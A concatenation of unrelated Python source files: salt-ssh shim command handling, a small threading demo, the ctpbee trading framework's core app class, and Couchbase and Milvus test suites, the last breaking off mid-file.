5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr which means SHIM completed and only
# and remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need to be root or use sudo:\n {0}"
)
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
"Python version error. Recommendation(s) follow:\n"
"- Install Python 3 on the target machine(s)\n"
"- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
version_parts = ret[1].split(b",")[0].split(b"_")[1]
parts = []
for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
threadSimple.py | #!/usr/bin/python
# Simple threading program
import time
import threading
def printChars():
for x in range(0,10):
print x
def printLines():
for x in range(0,10):
print "Hello Thread!"
time.sleep(1)
t1 = threading.Thread(target = printChars)
t2 = threading.Thread(target = printLines)
t1.start()
t2.start()
|
app.py | # coding:utf-8
import os
import sys
from datetime import datetime
from inspect import ismethod
from threading import Thread
from time import sleep
from typing import Text
from werkzeug.datastructures import ImmutableDict
from ctpbee import __version__
from ctpbee.looper.data import VessData
from ctpbee.looper.report import render_result
from ctpbee.util import RiskLevel
from ctpbee.center import Center
from ctpbee.config import Config
from ctpbee.constant import Exchange
from ctpbee.context import _app_context_ctx
from ctpbee.constant import Event, EVENT_TIMER
from ctpbee.exceptions import ConfigError
from ctpbee.helpers import end_thread
from ctpbee.helpers import find_package, refresh_query, graphic_pattern
from ctpbee.interface import Interface
from ctpbee.level import CtpbeeApi, Action
from ctpbee.log import VLogger
from ctpbee.record import Recorder
from ctpbee.cprint_config import CP
from ctpbee.jsond import dumps
from ctpbee.signals import AppSignal, common_signals
class CtpBee(object):
"""
ctpbee 源于我对于做项目的痛点需求, 旨在开发出一套具有完整api的交易微框架
I hope it will help you !
"""
# 默认回测配置参数
default_params = {
'cash': 10000.0,
'check_submit': True,
'eos_bar': False,
'filler': None,
"commision": 0.01,
'slip_percent': 0.0,
'slip_fixed': 0.0,
'slip_open': False,
'slip_match': True,
'slip_limit': True,
'slip_out': False,
'coc': False,
'coo': False,
'int2pnl': True,
'short_cash': True,
'fund_start_val': 100.0,
'fund_mode': False
}
default_config = ImmutableDict(
dict(LOG_OUTPUT=True, # 是否开启输出模式
TD_FUNC=False, # 是否开启交易功能
INTERFACE="ctp", # 接口参数,默认指定国内期货ctp
MD_FUNC=True, # 是否开启行情功能
XMIN=[], # k线序列周期, 支持一小时以内的k线任意生成
ALL_SUBSCRIBE=False,
SHARE_MD=False, # 是否多账户之间共享行情,---> 等待完成
SLIPPAGE_COVER=0, # 平多头滑点设置
SLIPPAGE_SELL=0, # 平空头滑点设置
SLIPPAGE_SHORT=0, # 卖空滑点设置
SLIPPAGE_BUY=0, # 买多滑点设置
LOOPER_PARAMS=default_params, # 回测需要设置的参数
SHARED_FUNC=False, # 分时图数据 --> 等待优化
REFRESH_INTERVAL=1.5, # 定时刷新秒数, 需要在CtpBee实例化的时候将refresh设置为True才会生效
INSTRUMENT_INDEPEND=False, # 是否开启独立行情,策略对应相应的行情
CLOSE_PATTERN="today", # 面对支持平今的交易所,优先平今或者平昨 ---> today: 平今, yesterday: 平昨, 其他:d
TODAY_EXCHANGE=[Exchange.SHFE.value, Exchange.INE.value], # 需要支持平今的交易所代码列表
AFTER_TIMEOUT=3, # 设置after线程执行超时,
TIMER_INTERVAL=1,
PATTERN="real"
))
config_class = Config
import_name = None
# 交易api与行情api / trade api and market api
market = None
trader = None
tools = {}
def __init__(self,
name: Text,
import_name,
action_class: Action or None = None,
engine_method: str = "thread",
logger_class=None, logger_config=None,
refresh: bool = False,
risk: RiskLevel = None,
instance_path=None):
"""
name: 创建运行核心的名字
import_name: 导入包的名字, 用__name__即可'
action_class: 执行器 > 默认使用系统自带的Action, 或者由用户继承,然后传入类
engine_method: Actor模型采用的底层的引擎
logger_class: logger类,可以自己定义
refresh: 是否自己主动持仓
risk: 风险管理类, 可以自己继承RiskLevel进行定制
sim: 是否进行模拟
"""
self.start_datetime = datetime.now()
self.basic_info = None
self._extensions = {}
self.name = name if name else 'ctpbee'
self.import_name = import_name
self.engine_method = engine_method
self.refresh = refresh
self.active = False
# 是否加载以使用默认的logger类/ choose if use the default logging class
if logger_class is None:
self.logger = VLogger(CP, app_name=self.name)
self.logger.set_default(name=self.logger.app_name, owner=self.name)
else:
if logger_config:
self.logger = logger_class(logger_config, app_name=self.name)
else:
self.logger = logger_class(CP, app_name=self.name)
self.logger.set_default(name=self.logger.app_name, owner='App')
self.app_signal = AppSignal(self.name)
if engine_method == "thread":
self.recorder = Recorder(self)
else:
raise TypeError("引擎参数错误,只支持 thread 和 async,请检查代码")
"""
If no risk is specified by default, set the risk_decorator to None
如果默认不指定action参数, 那么使用设置风控装饰器为空
"""
if risk is None:
self.risk_decorator = None
else:
self.risk_decorator = risk
"""
If no action is specified by default, use the default Action class
如果默认不指定action参数, 那么使用默认的Action类
"""
if action_class is None:
self.action: Action = Action(self)
else:
self.action: Action = action_class(self)
"""
根据action里面的函数更新到CtpBee上面来
bind the function of action to CtpBee
"""
"""
If engine_method is specified by default, use the default EventEngine and Recorder or use the engine
and recorder basis on your choice
如果不指定engine_method参数,那么使用默认的事件引擎 或者根据你的参数使用不同的引擎和记录器
"""
if instance_path is None:
instance_path = self.auto_find_instance_path()
elif not os.path.isabs(instance_path):
raise ValueError(
'If an instance path is provided it must be absolute.'
' A relative path was given instead.'
)
self.instance_path = instance_path
self.config = self.make_config()
self.init_finished = False
self.qifi = None
# default monitor and flag
self.p = None
self.p_flag = True
self.r = None
self.r_flag = True
self.center: Center = Center(self)
""" update """
if self.risk_decorator is not None:
self.risk_decorator.update_app(self)
for x in dir(self.action):
func = getattr(self.action, x)
if x.startswith("__"):
continue
if ismethod(func):
setattr(self, func.__name__, func)
_app_context_ctx.push(self.name, self)
self.data = []
def add_data(self, *data):
"""
载入历史回测数据
"""
if self.config.get("PATTERN") == "looper":
self.data = data
else:
raise TypeError("此API仅仅接受回测模式, 请通过配置文件 PATTERN 修改运行模式")
def update_action_class(self, action_class):
if isinstance(action_class, Action):
raise TypeError(f"更新action_class出现错误, 你传入的action_class类型为{type(action_class)}")
self.action = action_class(self)
def update_risk_gateway(self, gateway_class):
self.risk_decorator = gateway_class
self.risk_decorator.update_app(self)
def make_config(self):
""" 生成class类"""
defaults = dict(self.default_config)
return self.config_class(self.instance_path, defaults)
def auto_find_instance_path(self):
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path)
return os.path.join(prefix, 'var', self.name + '-instance')
@property
def td_login_status(self):
""" 交易 API 都应该实现td_status"""
return self.trader.td_status
@property
def md_login_status(self):
""" 行情 API 都应该实现md_status"""
return self.market.md_status
def _running(self, logout=True):
"""
根据当前配置文件下的信息载入行情api和交易api,记住这个api的选项是可选的
"""
self.active = True
if "CONNECT_INFO" in self.config.keys():
info = self.config.get("CONNECT_INFO")
else:
raise ConfigError(message="没有相应的登录信息", args=("没有发现登录信息",))
show_me = graphic_pattern(__version__, self.engine_method)
if logout:
print(show_me)
MdApi, TdApi = Interface.get_interface(self)
if self.config.get("MD_FUNC"):
self.market = MdApi(self.app_signal)
self.market.connect(info)
if self.config.get("TD_FUNC"):
self.trader = TdApi(self.app_signal)
self.trader.connect(info)
if self.refresh:
if self.r is not None:
self.r_flag = False
sleep(self.config['REFRESH_INTERVAL'] + 1.5)
self.r = Thread(target=refresh_query, args=(self,), daemon=True)
self.r.start()
else:
self.r = Thread(target=refresh_query, args=(self,), daemon=True)
self.r.start()
self.r_flag = True
def start(self, log_output=True, debug=False):
"""
开启处理
:param log_output: 是否输出log信息
:param debug: 是否开启调试模式 ----> 等待完成
:return:
"""
if self.config.get("PATTERN") == "real":
def running_timer(common_signal):
while True:
event = Event(type=EVENT_TIMER)
common_signal.timer_signal.send(event)
sleep(self.config['TIMER_INTERVAL'])
self.timer = Thread(target=running_timer, args=(common_signals,))
self.timer.start()
self.config["LOG_OUTPUT"] = log_output
self._running(logout=log_output)
elif self.config.get("PATTERN") == "looper":
self.config["INTERFACE"] = "looper"
show_me = graphic_pattern(__version__, self.engine_method)
if log_output:
print(show_me)
Trader, Market = Interface.get_interface(app=self)
self.trader = Trader(self.app_signal, self)
self.market = Market(self.app_signal)
print(">>>> 回测接口载入成功")
self._start_looper()
else:
raise ValueError("错误的参数, 仅仅支持")
def get_result(self, report: bool = False, **kwargs):
"""
计算回测结果,生成回测报告
:param report: bool ,指定是否输出策略报告
:param auto_open: bool, 是否让浏览器自动打开回测报告
:param zh:bpol, 是否输出成中文报告
"""
strategys = list(self._extensions.keys())
end_time = datetime.now()
"""
账户数据
"""
account_data = self.trader.account.get_mapping("balance")
"""
耗费时间
"""
cost_time = f"{str(end_time.hour - self.start_datetime.hour)}" \
f"h {str(end_time.minute - self.start_datetime.minute)}m " \
f"{str(end_time.second - self.start_datetime.second)}s"
"""
每日盈利
"""
net_pnl = self.trader.account.get_mapping("net_pnl")
"""
成交单数据
"""
trade_data = list(map(dumps, self.trader.traded_order_mapping.values()))
position_data = self.trader.position_detail
if report:
path = render_result(self.trader.account.result, trade_data=trade_data, strategy=strategys,
net_pnl=net_pnl,
account_data=account_data, datetimed=end_time, position_data=position_data,
cost_time=cost_time, **kwargs)
print(f"请复制下面的路径到浏览器打开----> \n {path}")
return path
return self.trader.account.result
def add_basic_info(self, info):
""" 添加基础手续费以及size_map等信息 """
if self.config.get("PATTERN") != "looper":
raise TypeError("此API仅在回测模式下进行调用")
self.basic_info = info
def _start_looper(self):
""" 基于现有的数据进行回测数据 """
d = VessData(*self.data)
if self.basic_info is not None:
self.trader.account.basic_info = self.basic_info
""" trader初始化参数"""
self.trader.init_params(params=self.config)
while True:
try:
p = next(d)
self.trader(p)
except StopIteration:
self.logger.info("回测结束,正在生成结果")
break
except ValueError:
raise ValueError("数据存在问题, 请检查")
def remove_extension(self, extension_name: Text) -> None:
"""移除插件"""
if extension_name in self._extensions:
del self._extensions[extension_name]
def add_extension(self, extension: CtpbeeApi):
"""添加插件"""
self._extensions.pop(extension.extension_name, None)
extension.init_app(self)
def suspend_extension(self, extension_name):
extension = self._extensions.get(extension_name, None)
if not extension:
return False
extension.frozen = True
return True
def get_extension(self, extension_name):
if extension_name in self._extensions:
return self._extensions.get(extension_name)
else:
return None
def enable_extension(self, extension_name):
extension = self._extensions.get(extension_name, None)
if not extension:
return False
extension.frozen = False
return True
def del_extension(self, extension_name):
self._extensions.pop(extension_name, None)
def reload(self):
""" 重新载入接口 """
if self.market is not None:
self.market.close()
if self.trader is not None:
self.trader.close()
# 清空处理队列
sleep(3)
self.market, self.trader = None, None
self._running()
def release(self):
""" 释放账户,安全退出 """
try:
if self.market is not None:
self.market.close()
if self.trader is not None:
self.trader.close()
self.market, self.trader = None, None
if self.r is not None:
""" 强行终结掉线程 """
end_thread(self.r)
if self.timer is not None:
end_thread(self.timer)
except AttributeError:
pass
|
lockmode_t.py | #
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
import time
from couchbase_v2.exceptions import ObjectThreadException
from couchbase_tests.base import CouchbaseTestCase, CollectionTestCase
from couchbase.options import LockMode
class LockmodeTest(CollectionTestCase):
def test_lockmode_defaults(self):
# default is LOCKMODE_EXC
key = self.gen_key("lockmode_defaults")
cb = self.make_connection()
self.assertEqual(cb.lockmode, LockMode.EXC)
cb._thr_lockop(0)
cb._thr_lockop(1)
cb.upsert(key, "value")
cb = self.make_connection(lockmode=LockMode.NONE)
self.assertEqual(cb.lockmode, LockMode.NONE)
self.assertRaises(ObjectThreadException,
cb._thr_lockop, 1)
self.assertRaises(ObjectThreadException,
cb._thr_lockop, 0)
cb.upsert(key, "value")
cb = self.make_connection(lockmode=LockMode.WAIT)
self.assertEqual(cb.lockmode, LockMode.WAIT)
cb._thr_lockop(0)
cb._thr_lockop(1)
cb.upsert(key, "value")
cb = self.make_connection(lockmode=LockMode.WAIT, unlock_gil=False)
self.assertEqual(cb.lockmode, LockMode.NONE)
cb.upsert(key, "value")
def test_lockmode_exc(self):
key = self.gen_key("lockmode_exc")
cb = self.make_connection()
cb._thr_lockop(0)
self.assertRaises(ObjectThreadException,
cb.upsert,
key, "bar")
cb._thr_lockop(1)
# Ensure the old value is not buffered
cb.upsert(key, "baz")
self.assertEqual(cb.get(key).content, "baz")
def test_lockmode_wait(self):
key = self.gen_key("lockmode_wait")
cb = self.make_connection(lockmode=LockMode.WAIT, unlock_gil=True)
d = {
'ended' : 0
}
def runfunc():
cb.upsert(key, "value")
d['ended'] = time.time()
cb._thr_lockop(0)
t = Thread(target=runfunc)
t.start()
time.sleep(0.5)
time_unlocked = time.time()
cb._thr_lockop(1)
t.join()
self.assertTrue(d['ended'] >= time_unlocked)
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": ut.gen_vectors(1, ut.default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in ut.index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = ut.default_segment_row_limit + 1
result = connect.insert(collection, ut.gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
